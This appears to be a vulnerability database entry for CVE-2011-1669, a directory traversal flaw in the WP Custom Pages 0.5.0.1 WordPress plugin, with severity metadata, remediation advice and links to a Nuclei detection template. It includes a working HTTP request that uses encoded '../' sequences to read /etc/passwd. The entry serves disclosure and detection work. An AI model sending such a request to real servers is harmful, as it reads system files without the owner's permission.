| Title | WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.01195 |
| CVE ID | CVE-2011-1669 |
| CWE ID | CWE-22 |
| Tags | cve cve2011 edb wordpress wp-plugin lfi mikoviny vuln |
A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-1669.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-1669.pcap
N/AN/A